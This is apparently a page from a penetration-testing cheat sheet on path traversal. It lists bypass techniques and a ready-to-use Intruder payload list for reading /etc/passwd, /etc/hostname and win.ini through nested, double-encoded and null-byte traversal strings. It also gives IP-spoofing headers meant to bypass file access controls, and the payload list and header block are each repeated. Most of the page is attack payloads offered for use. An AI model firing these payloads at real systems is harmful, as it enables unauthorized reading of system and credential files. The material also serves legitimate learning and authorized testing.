Path Traversal

Application blocks traversal sequences but treats the supplied filename as being relative to a absolute path and can be exploit with /etc/passwdabsolute path to target file payload.
Images on target is loaded using filename parameter, and is defending against traversal attacks by stripping path traversal. Exploit using ....//....//....//....//etc/passwd payloads.
Superfluous URL-encoded ..%252f..%252f..%252fetc/passwd payload can bypass application security controls.
Leading the beginning of the filename referenced with the original path and then appending /var/www/images/../../../etc/passwd payload at end bypasses the protection.
Using a null byte character at end plus an image extension to fool APP controls that an image is requested, this ../../../etc/passwd%00.png payload succeed.
Double URL encode file path traversal, as example this ../../../../../../../../../../etc/hostname will be URL double encoded as, %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname.
Windows OS accept both ../ and ..\ for directory traversal syntax, and as example retrieving loadImage?filename=..\..\..\windows\win.ini on windows target to identify valid path traversal.

Intruder payloads list:

/etc/passwd
....//....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Headers to bypass access to files

X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: localhost
X-Forward-For: localhost
X-Remote-IP: localhost
X-Client-IP: localhost
X-Real-IP: localhost

X-Originating-IP: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1

PreviousSSTI NextFile Upload

Last updated 10 months ago

/etc/passwd ....//....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd /var/www/images/../../../etc/passwd ../../../etc/passwd%00.png %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Headers to bypass access to files

X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: localhost
X-Forward-For: localhost
X-Remote-IP: localhost
X-Client-IP: localhost
X-Real-IP: localhost

X-Originating-IP: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1